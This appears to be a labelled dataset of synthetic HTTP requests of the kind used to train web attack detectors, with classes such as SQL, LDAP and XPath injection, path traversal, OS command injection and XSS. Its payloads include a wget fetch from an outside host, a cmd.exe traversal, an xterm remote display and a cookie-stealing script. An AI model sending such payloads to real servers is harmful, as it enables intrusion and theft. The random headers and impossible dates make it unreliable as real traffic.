uzo4fth7tvcegn=[uitt hhlref3e&eloYkmctHrIl5n=1367507&faydraHnstu3aXI=188&D7E_9.b4Ko=auiAehnRZnr&oYed7u4Ile=ucrUiotvci&aEna1emOrs2iee=4z3d_e22R&sqt=0n&lio6=76884602&ace=tsn&adminK19De-GTM=81&tfakuhc=nVlewlrecshgqadA&vfTrcp.1aE=rinoenhokoaeai&Hae1uk5rrgo5=97&ieid6tsmcsua=554259&edegoe=euc1msiEannatm3oS

End - Id: 50115
Start - Id: 38692
class: LdapInjection
GET /RbIb.dll?heesaFy8iE=as9s+oazaitdd&l0=8603&iewhereadminhavinguYn=mc%29%28%26%28objectClass++%3D++268*%29&8GQebinpositionautoexec8passthru5oX=%3Aselect%3Auai+eunscript&ppt=lbsnullnsntn&et=86uY-Jvi_&WCHselectS-=dhttph&23cCr=ao HTTP/1.1
Host: www.Z6lceetd.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp, windows-874;q=0.9, windows-874, iso-8859-8-i, euc-tw
Accept-Encoding: 
Accept-Language: ofreooi-iaz9muv, ae-eo
Cache-Control: min-fresh=4889
Client-ip: 218.181.248.159
Cookie: uocetSs=RAtpaegdo;urnitlboes=iweecndjEdoos6lid5
Cookie2: $Version="63"
Date: Wed, 15 Jun 05 24:36:05 CET
ETag: "HWE3e03wBl7aeKYTB"
Expect: ribEgiA=itelO;odita
From: nTromT8u@pzcel.it
If-Modified-Since: Fri, 03 Aug 07 10:34:50 GMT
If-Unmodified-Since: Thu, 13 Aug 09 17:37:05 CET
If-Match: "nArH4aYAaWqdjwu"
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: Wed, 09 Jun 04 10:42:51 UTC
Max-Forwards: 0358
MIME-Version: 5.4
Pragma: mo90fdfe=eaesoljA
Proxy-Authorization: Digest realm
Authorization: Ns5wt sihbnas=Atnr6O
Range: 32-1,3888-481886
Referer: http://www.nekn0n5.de/Tiu7ii.jsp
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.1 (X11; U; Unix 4.4; Ia-mm; rv:9.9.9) Gecko/94171408
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 420x9995
Via: 0.1 www.dida.jpeg, 3.6 178.2.65.161, tkUtN/6.4 www.dyvlseh5.htm
Transfer-Encoding: YrEt; bdhhi=osdttA
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 502 www.ssta3set.jpeg "SptsmeMga8ettons" "Wed, 02 Apr 08 05:31:51 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 38692
Start - Id: 45539
class: PathTransversal
GET /0msmsgadsgei/JUL1NSsxml5passthruinputO/iH/dUGRJyogp/tnstewn6qlerel2pl.cgi?la5e=hE&waicDae=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fritaleesni%2Fit%2Freleananin%2Fngnsve.php3 HTTP/1.0
Host: 161.57.60.83
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-2, ks_c_5601-1987;q=0.8, iso-2022-kr
Accept-Encoding: deflate, compress, gzip;q=0.6, deflate;q=0.4, identity
Accept-Language: 8i-tHthrt;q=0.3, gneqnqp-rsqeo
Cache-Control: no-store
Client-ip: 214.225.200.54
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="20"
Date: Tue, 29 Jun 04 13:51:05 UTC
ETag: "Ze@vy62aYSghPKIo"
Expect: 100-continue
From: muibee@Egtuem.uk
If-Modified-Since: Sat, 29 Oct 05 24:01:28 UTC
If-Unmodified-Since: Sun, 04 Sep 05 08:38:05 UTC
If-Match: "Ei-1w8cESN8ZjMTSry"
If-None-Match: "S@3pqppy8N3ysEXy1"
If-Range: *
Max-Forwards: 3
MIME-Version: 3.3
Pragma: sa=lItz
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: 5Lsdai shnsRyd=i8hqCn
Range: 903-3,3-4324,-8
Referer: http://www.weaeAt.biz/iamgor/relo/stahrN/7EtAc/aittien.png
TE: trailers
Trailer: Accept-Language
User-Agent: lEa1te8/6.1.6.4.8
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 589x0586
Via: 3.6 187.66.182.212
Transfer-Encoding: eonnEu
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 167.86.117.234
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45539
Start - Id: 43025
class: OsCommanding
PUT /9sd_KV/Fdeletes/g8suaennod4Mtyeofah.cgi? HTTP/1.1
Content-Length: 318
Content-Language: rnoyepas,r8r
Content-Encoding: deflate
Content-Location: http://www.wtoAwi.fr/aNb8.ace
Content-MD5: bmJJblJtZWh3bndtZmllYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 13:06:45 CET
Last-Modified: Sun, 25 Jun 06 17:22:31 GMT
Host: 156.200.221.187
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-tw, windows-1250, macintosh;q=0.1, iso-8859-4
Accept-Encoding: compress, compress, gzip, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 89.141.82.219
Cookie: dmngynsAyaa=mre;nuwr=37rakrtiarfqkc:A;ewoedtretblOG==te;0dBJ2pSENZVk=go;oF1NrZ=htaccesscriptscriptm
Cookie2: $Version="3"
Date: Wed, 17 Jun 09 18:01:50 UTC
ETag: W/"l1DL3o5wTaFl6-8I4js"
Expect: 100-continue
From: 1ke4@enu9hmpEs.ch
If-Modified-Since: Fri, 18 May 07 18:28:56 CET
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: *
If-None-Match: *
If-Range: "-jqt.BMEeUF_PqoA"
Max-Forwards: 56
Pragma: no-cache
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Basic MW5ydzJpOmg2cHNvNEU=
Range: -98633,070828-,-9277
Referer: /lnee/tN1e/mcet/jetsoaCa.jpg
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/2.7 (Windows; U; Win98 5.7; 5e-hp; rv:7.0.3) Gecko/26959311
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2695x320
Via: 1.1 www.mdlaeei.html, HTTP/8.5 76.222.119.122, HTTP/7.3 www.iuexga.tiff
Transfer-Encoding: woe0sh
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: ------------
~~~~~: ~~~~~~~~~~~~~~

yLngnparw7ejrmS=bf75aho5eslseinnme&wCgB=s3kJakBnnSc&cT75uvtinirCch=yot&exag5rHsthsmo=$j&z8e=mailvaram&ZynullRNQZHlocation2cA=rndmcn9arhr3ae6nb&bC8hxN8jl="     ;    /usr/bin/wget     www.olrole.com/ar ;&oyM=w7d &execvKboot.inicatmLu=4977362&rowhoimFnNe=dRv50&EE=n o e?nissp &tOa8aetroig5a=ue\rewsnHn

End - Id: 43025
Start - Id: 44421
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.swgtseana.ch:80
Connection: cc4t3iat
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: xc-y5, t-1yuCti;q=0.3, gt-q;q=0.2, yeoolesn-eeisIl;q=0.3, nb-kidlwh4a
Cache-Control: max-stale
Client-ip: 30.185.60.145
Cookie: hRsuh7=odRFiralrnd\ih
Cookie2: $Version="352"
Date: Sat, 06 May 06 08:39:17 UTC
ETag: W/"pH3z7Lb_BNHVotjveEcj"
Expect: 100-continue
From: i1nh90u@tvpyl.biz
If-Modified-Since: Sat, 28 Jul 07 17:07:26 CET
If-Unmodified-Since: Tue, 09 Nov 04 13:12:12 UTC
If-Match: "hHQfop70q-1sGJ@tnRkC"
If-None-Match: "Mn5Mz2@cIHYZzIO8iZ0k"
If-Range: *
Max-Forwards: 1525
MIME-Version: 6.2
Pragma: a2rsn=mseL4a
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: NTLM QWRzbnRnOGRlNHRucm1oY2FhaGl2bG9FZWVJU2FkbnJ6aXM=
Range: 6-02287,72753-
Referer: http://www.rtfn5.org/tofa/oodpveie.swf
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/6.5 (Windows; U; WinNT 3.7; ol-Dl; rv:2.1.2) Gecko/88178677
UA-CPU: Sparc
UA-Disp: 015,480,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: deflate
Upgrade: esoj5m/0.8
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 850961396
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44421
Start - Id: 36858
class: LdapInjection
GET /eath5h/stot6b/t@N6PX/5z_hu9/U0Uqaqp/0c8heramnTaea6p/tJ/FYwinntdZsKE0/rlnNAa4F/irawb7ElA/cftpXPxS/i_I5lMzUUVw9m4E3mabX.jsp? HTTP/1.1
Host: 92.23.56.230:80
Connection: 5xs1IHue
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: skmv)(  |(eSy=*)
Cache-Control: max-stale
Client-ip: 209.177.77.169
Cookie: aHha=b ;deall nqsoZhta
Cookie2: $Version="95"
Date: Fri, 03 Mar 06 12:50:19 GMT
ETag: "93Pa0A.Gi0zdrPvWdQy1"
Expect: 100-continue
From: lvelladt@3trbvtitH.net
If-Modified-Since: Tue, 30 May 06 03:52:06 GMT
If-Unmodified-Since: Wed, 06 Oct 04 09:41:47 GMT
If-Match: "zRzehBEAj8jTFKdQmY"
If-None-Match: *
If-Range: *
Max-Forwards: 475
MIME-Version: 9.1
Pragma: no-cache
Authorization: Digest uri=http://eiecdnRr.ch/Iftd/y8awyiFe.png
Range: 62221-7,-0
Referer: http://www.natrn.uk/jteaccni/83gAfodh/qqT7A/d56aabxn/ranoa.exe
TE: chunked
User-Agent: Mozilla/6.7 (compatible; emi5; Linux i586; sotrtv7)
UA-CPU: MIPS
UA-Disp: 564,7539,32
UA-Color: color32
UA-Pixels: 6170x381
Via: 5.9 www.947aE.jpeg
Transfer-Encoding: 3em9h0
Warning: 867 89.104.184.212 "huesnmueeatale" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36858
Start - Id: 38929
class: LdapInjection
GET /esaipctihhaqdhnr7l/iYZ/cMlIUxstE_SESwqGzD/rs5nlaegmo.mdb?vpmoy5N=%29+%28++%7C+++%28++cn%3D*o++++%27brien*%29%28mail+++%3D*o%27brien*%29++++ HTTP/1.1
Host: 95.226.88.234
Connection: 3gsbesia
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: 41Obixd-Ye5edpEl;q=0.8, ite5O-ef, r-x, r-wteh2soe
Cache-Control: no-store
Client-ip: 200.234.213.150
Cookie: e0eh59hhdDe=cMX25Mo5
Cookie2: $Version="0"
Date: Thu, 01 Feb 07 21:27:42 CET
ETag: "eEIaAeCLc.OCQI1"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sat, 18 Mar 06 22:31:12 GMT
If-Unmodified-Since: Sat, 16 Aug 08 22:52:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: mtSl wopwaseh=raeaa
Authorization: NTLM dGRmMWxiYW8yZXRzM2Fscm5rZGtlbGhpc2dobnR6aHR2MGFsY3l0RHVp
Range: -33293
Referer: http://tneahEq2.org/EUrtIteo/remyod/cunm/io00o/hnaaeeea.jpeg
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 2.0; gs-Ro; rv:2.1.7) Gecko/36116611
UA-CPU: Sparc
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: smcm/4.6 127.112.178.109, 8.5 www.uchs.html, 8.0 181.188.205.125
Transfer-Encoding: A0Paa
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38929
Start - Id: 42317
class: SqlInjection
GET /OR/olD64L0kzIY5LPy/asbVt4cdNsxj6WXg.aspx?.2wsA3=0&alnEceoreja=OrigText%27OR%27hcio%27++%3D++++%27xhoenzpo%27&obumoetaNesxusu=13238&hSsiaxrcaG=073&1j1plike9y=rbetweenjm&oie8o3sszlesr=eim+sza%5CcTrr%5Dewson%26&VdcTiYKB3fr=s&replaceO8sf24=AeeTm0igodn&8v@O=naoo4sioelogTeoe&545e8NJ8o=A4f%5DonAobs&er8=a&reijw=4nxs+ HTTP/1.0
Host: 52.172.212.38
Connection: jeet
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a9of-kocdha, 8-aaehu;q=0.7, r-hRs7, xf-eie, z2nrtmdp-gqosf
Cache-Control: no-cache
Client-ip: 207.145.129.12
Cookie: hr=nqn\4;munae9hfB=n.S_LZgMX;Mofshoh4l67=:;[rrbreplaced
Cookie2: $Version="97"
Date: Thu, 07 Sep 06 19:31:19 UTC
ETag: W/"B0ey7AsP8hhSmLGY"
Expect: sEeh=gef1
From: h5dt@dgwd.cz
If-Modified-Since: Mon, 22 Jun 09 02:28:27 CET
If-Unmodified-Since: Mon, 02 Mar 09 19:26:13 GMT
If-Match: *
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: "34tX5k06-tS.PcRqB"
Max-Forwards: 0146
MIME-Version: 7.7
Pragma: h='u'
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic YTJ3ZmthMzpjZTBlVGF0dA==
Range: -36
Referer: http://www.ehaui.gov/icwcsh1o/tQrciJas/hoiefno/ohee/tu0orw.css
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/7.0 (X11; U; SunOS sun4u 1.6; Bb-ia; rv:5.8.2) Gecko/96196477
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4371x6437
Via: 8.4 www.6sxpebn.js
Transfer-Encoding: Txsaen
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42317
Start - Id: 37081
class: LdapInjection
GET /aNS8tkzU/psDcZtagY/DDd/is/F2ZSFYvozcHMDME/oNntassa7SeRnooewE/4RI6DNW4divF6.Xf6/h9fHnVnE7c5r/p@R-bJOA/Wa_N-.jpg?fR=cnu%29%28%26%28objectClass++%3D++++sedo*%29&wtbanteE=re&ncwixnte=Ned9s&bsyugqio=+o%3Dd&forU=ne+oc&ak8arno=systemr+alllHeuitac5&sg=34&iGevrtiMted=hgto9oe&naeheotsnyehrl=eaeduiss&9r2djttceussa=tTsntkaPe8ej&77=passwdsdrop%7En7uem&tQSpfxdconnect@updater=qgsfnMndiwefBthdb&engqsuMiiaAst=715854 HTTP/1.0
Host: 207.255.153.166
Connection: close
Accept: audio/*, application/*, image/gif;q=0.3
Accept-Charset: x-mac-greek;q=0.6, euc-cn;q=0.0, x-mac-roman;q=0.0, windows-1255;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 154.56.180.14
Cookie: Initt=ln;2ojetbntse=slwinnt67kdi ei@orlsmoh 
Cookie2: $Version="6"
Date: Sun, 08 Jul 07 03:42:16 CET
ETag: "Qo5vB6y78EBMnbaX9j.Q"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Thu, 31 Mar 05 17:42:23 GMT
If-Unmodified-Since: Tue, 21 Dec 04 07:07:30 UTC
If-Match: "FD7kfWPgalmexT4Sy3n"
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 4
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: EFncp idiad=wotetip
Range: -5
Referer: /Wann/e7nt2e/s7izsn.htm
TE: trailers,trailers
Trailer: From
User-Agent: eaitneAvso/4.3.5
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7857x018
Via: 4.0 www.Aasuneu.gif:17, 5.5 78.123.220.64, HTTP/5.9 www.tacbdhd.htm
Transfer-Encoding: nald
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 905 www.ilsemrE.gif "n9hMwntaulc" "Sat, 03 Nov 07 02:21:06 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37081
Start - Id: 45278
class: PathTransversal
GET /sd7mhtehec2ph/n6q5U/mouhirnonme7itoh/desapiv/SH0SP-fexecwTSV_/iGr6lme/andosXfromj7jb0samX/ow_48A0vMwH/Edmsy/0binbgsoundk8/eoomb/srMsE9CWpjN41JCd.css? HTTP/1.1
Host: 153.18.199.165:44883
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.2, deflate, deflate;q=0.9, compress, identity
Accept-Language: ../../../../../../../../../WINDOWS/autoexec.bat
Cache-Control: only-if-cached
Client-ip: 85.39.168.130
Cookie: eYsRssnmIos=eVJZP
Cookie2: $Version="892"
Date: Wed, 29 Jun 05 24:31:53 CET
ETag: "pIKwO7uj8k..IjX5sTc2"
Expect: jsnos=Ueujts;921dnO2=ardr
From: ra7rtweh@ttrsy.org
If-Modified-Since: Thu, 28 Jan 10 08:18:12 UTC
If-Unmodified-Since: Tue, 08 Mar 05 09:34:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.8
Pragma: 1c=g5e
Proxy-Authorization: Basic ZUlrN2RhaXQ6ZHl3TjlSVHM=
Authorization: aahse nokw7=qaoaern
Range: 259-814,-6312
Referer: http://www.h4dw.it/aayshnd.zip
TE: gzip;q=0.2
Trailer: Host
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 7.6; yq-oa; rv:2.8.4) Gecko/69061529
UA-CPU: 68000
UA-Disp: 4571,953,16
UA-OS: Mac OS X
UA-Pixels: 0624x6647
Via: 9.6 www.pdseonid.htm, Gptihi/3.9 68.222.146.74
Transfer-Encoding: compress
Upgrade: hau3E/8.8, 3q3eqe/2.3, eaxe4/7.9
Warning: 494 255.48.101.36:36380 "e28hr" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45278
Start - Id: 36926
class: LdapInjection
POST /aefrr4sn2riooiOib/sn/67gSD@mr2vNCN3/eoos/HuXirtaetlmlZbmt/c4snwo/rmBhoptMwffAazshutdownUqA/UiZTFlinksPtyUYqy/rO8hw1_xLBS_Q/eUebgu2OUPkZluOkwJ/8kSiLRy3gEMSQ6uSS9tb/mCfTEl2EuE.tmpAcn.swf? HTTP/1.0
Content-Length: 42
Content-Language: l,gc
Content-Encoding: compress
Content-Location: /inne5h/oggt/nlieeo.pdf
Content-MD5: ZW54ZWVlZWV2cWxhdGNzcA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 03:05:51 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: www.wIrism0Yt5.gov:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: cnst-nsjoio, gaoc-e4Bezien
Cache-Control: max-stale=167
Client-ip: 162.232.160.26
Cookie: tdsavdt8ipcafhi=rw;gfh=onl2tGManetidfatd;isreae1stbbniee=oatUte(e;rr=fHm f0ante/;aaziOh=48
Cookie2: $Version="3"
Date: Tue, 19 Feb 08 13:37:21 UTC
ETag: W/"d7Bmeqt30DrvtRfk"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 08 Feb 05 17:14:06 CET
If-Unmodified-Since: Sun, 11 Jan 09 16:12:18 CET
If-Match: *
If-None-Match: "e.NTY.GZZmMpVOYhRJo"
If-Range: *
Max-Forwards: 8923
MIME-Version: 5.9
Pragma: OecrGjt=kae9ne
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Basic NHRnOG46ZXNKZQ==
Range: 561483-,67-,02097-305
Referer: /aUgualrl/ooko/iwGur/tmqyYcxt.php
TE: deflate,chunked,gzip;q=0.6
Trailer: Accept
User-Agent: roui5yFs/4.8.4
UA-CPU: Sparc
UA-Disp: 0609,6015,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x0585
Via: 2.3 www.ayE2.css, HTTP/0.7 11.57.187.93, HTTP/0.9 www.qdco.js
Transfer-Encoding: gzip
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 591 www.lalfoh.gif "ed6niocL" "Fri, 23 Feb 07 23:24:32 CET"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jwMhasssidf=b4x)(|    (eDsn=*)

End - Id: 36926
Start - Id: 35631
class: XPathInjection
GET /r87e.XbRQ.momeGYdln/lef.aspx?5eitcGt=hAla9lijzshie&selectpCX4O6stdin@_P=68&eimrtrimuomsd8=8oe&28Iimg@stdin=te2aX3ssa6zt5q&Tnolc=45203+++++or+adi%2Fmmonn%2Fch%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D7%5D+or+++++0%3D&Alppsetaht=1054215&ohaoeRuip=admin&pqDaoRin=d%5C&enT9c=homeybes&Rgum=64676&copyF_S7=%3F9eer+usdocument8rl&nwejRiefSg=nO&o9nnerrars=r&lnnlmngek14eB=otcrBhg6ttseosris HTTP/1.0
Host: www.l4tXijiedo.it
Connection: close
Accept: application/x-tar;q=0.8, audio/x-wav
Accept-Charset: ks_c_5601-1987;q=0.9
Accept-Encoding: compress;q=0.4, compress, gzip, compress;q=0.3, identity;q=0.1
Accept-Language: i-sblabS;q=0.5, ciaE-Rdoao;q=0.9
Cache-Control: only-if-cached
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Fri, 18 Feb 05 03:25:07 GMT
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: MaheEaa=jmnFein;sneisk=ieirsrvw
From: rzin8cri@efHTe5.be
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Mon, 23 Oct 06 12:40:57 CET
If-Match: *
If-None-Match: "bIRHi456bMdFs.LvuB"
If-Range: "z285ETIARPyp0Sb0Hn.t"
Max-Forwards: 3
MIME-Version: 3.8
Pragma: i=Iieoal
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: 0Sri sdeo=1cleT9
Range: -38,162-85,-031
Referer: /eorthuro/lei1/oAtra/igms.swf
TE: trailers
Trailer: Upgrade
User-Agent: r5a2ocioehteeth
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 251x7424
Via: 7.6 www.oxfmgklo.tiff
Transfer-Encoding: deflate
Upgrade: eclhdI/8.8, x4oas2/8.6, oieb/7.4
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35631
Start - Id: 42599
class: SqlInjection
GET /1ihttp0BTq/s1t/shutdownGKVhupdatetmpbcatNKLM/xareotHI/ebcfwW.7rmrx.vVhHu/NALuH.pl?ncabrdr2e4oA=uot5trentiSt&ude8rreNeo6w=OR+%27twbheogeht%27++++IN+%28+%27+%27++%29&MJwp-zcuetinRt=td2s&cwre=tTY-4Xau&phm0sAI6E=8305306756&aeqrnuz7pat1le=z+teer&jeeDoiwefk=gai&duanFsKioz24s=81007570&50javkn=87&t8qh2=6238&srin1osTnt=wJs&emlroiosj=ddK5h&alt=412720 HTTP/1.1
Host: www.1rcm.com
Connection: close
Accept: audio/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 120.51.46.153
Cookie: w6ibJjshutdown=xs;halaiNaifAe=4000
Cookie2: $Version="17"
Date: Wed, 02 Feb 05 05:29:51 CET
ETag: "@tZ7R.40BYhxisnlW"
Expect: pgjdste=oiO9ae;5tcoSr
From: ioed@oROvlcftKp.biz
If-Modified-Since: Fri, 25 May 07 21:31:10 CET
If-Unmodified-Since: Wed, 20 Oct 04 09:01:32 UTC
If-Match: *
If-None-Match: "gnrSP5U@A4HrjYC"
If-Range: *
Max-Forwards: 45
Pragma: r='8iEgemxi'
Authorization: Digest response="AfffDc8D93B23AACB78BEcaDcEB07B62"
Referer: /mqwnta/j2inEcn.php4
TE: trailers,trailers,trailers
User-Agent: iht0pi (6FlLHvi; sRl4sU2z)
UA-CPU: Sparc
UA-Disp: 4133,8176,16
Via: HTTP/4.5 222.29.22.40
Transfer-Encoding: compress
Warning: 070 www.odrt.css "pawlewdifesnuntm" "Sun, 25 Mar 07 07:25:15 GMT"
----: -----------

null

End - Id: 42599
Start - Id: 43229
class: OsCommanding
GET /eeeoiain/uzJYJSpassthruwinntjCEikbK/dhSHJ16ALZDcfh/29styleCQYU/u@PeQUT1/dg6/BtYPcchildWW0rP/access_logofoOG/nitao/eirdtH99/iWg1KPvmegp-8GOP8x.php4?lt8=3337833&nst=iAv3o_T-cMSf&Z3idnhdihsg1=%250Axterm+++++-display+++www.raveringveis.com%3A0.0++&ufoeel0li=aheojx%3E%3Celaa HTTP/1.1
Host: 37.208.240.171
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: da-l;q=0.8
Cache-Control: He='ss4u'
Client-ip: 178.184.72.111
Cookie: 7m=2457;Mntlyo7o=3uoiframerepssi;rld=tcaNtudIie8aT
Cookie2: $Version="7"
Date: Sat, 30 Jul 05 05:15:53 GMT
ETag: "9rx-BTA31mnSsAa2XM1t"
Expect: cko1p=sTwOsene
From: Odth@g78cnm.uk
If-Modified-Since: Sat, 16 Jan 10 22:51:16 GMT
If-Unmodified-Since: Thu, 14 May 09 06:55:10 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9661
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest username="9indy"
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: -80151
Referer: http://www.cChNs.fr/5uOilCh.sh
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 4.8; ea-e3; rv:6.8.9) Gecko/82179247
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4808x019
Via: HTTP/8.3 www.ewoa7kf3.htm, FTP/0.8 www.ehnltt.jpg, FTP/9.7 65.1.208.140
Transfer-Encoding: identity
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 539 112.163.9.207 "rxe9Jsee" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3512760212193
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43229
Start - Id: 47042
class: XSS
GET /tIH8a4m9elopAJIm/kgbPzeYtoeplh.cfm?Amotdteoat=idsoLOhet796root&9vstyleNb-qvbscriptmetaformn=7257689511&ednanaenneesg=%3Cinput++++type+%3D%22+++image++++%22++++dynsrc+++%3D+%22++++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F122.148.119.243%2Falna.sh%27%2Bdocument.cookie%29%3B%5D++%22+%3E HTTP/1.1
Host: 152.208.80.157
Connection: keep-alive
Accept: video/*;q=0.8, application/*;q=0.8, image/png
Accept-Charset: x-mac-arabic;q=0.0, x-mac-arabic, macintosh, us-ascii;q=0.9, iso-8859-7;q=0.6
Accept-Encoding: *
Accept-Language: pfpo-taeeuiqa;q=0.1
